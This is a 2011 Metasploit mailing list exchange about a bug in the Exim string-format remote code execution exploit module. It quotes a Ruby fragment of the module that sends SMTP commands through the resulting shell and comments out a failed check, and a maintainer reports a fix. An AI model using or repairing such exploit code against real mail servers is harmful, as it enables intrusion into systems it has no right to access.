Metasploit mailing list archives
Re: Bug in exim4_string_format.rb
From: "Joshua J. Drake" <jdrake () metasploit com>
Date: Sun, 26 Jun 2011 01:08:43 -0500
On Fri, Jun 17, 2011 at 03:45:48PM +1000, Ty Miller wrote:
Hey guys, I had to make a small tweak to the exploit module msf3/modules/exploits/unix/smtp/exim4_string_format.rb to make it work on a system that I exploited recently ... print_status("Sending second message ...") buf = raw_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n") # Should be: "sh-x.x$ " !! print_status("MAIL result: #{buf.inspect}") if buf buf = raw_send_recv("RCPT TO: #{datastore['MAILTO']}\r\n") # Should be: "sh: RCPT: command not found\n" if buf print_status("RCPT result: #{buf.inspect}") if buf !~ /RCPT/ * print_error("Ty: Skipping over RCPT check exploit bug")* * #*raise RuntimeError, 'Something went wrong, perhaps this host is patched?' end end The sh-x.x part was being received when RCPT was expected in the module, so by commenting it out the module didn't terminate and the exploit worked.
Ty, I made a change to the module at r13032. It should fix address this. If possible, please test against your target and let me know if it works. -- Joshua J. Drake
Attachment:
_bin
Description:
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Bug in exim4_string_format.rb Ty Miller (Jun 16)
- Re: Bug in exim4_string_format.rb Joshua J. Drake (Jun 25)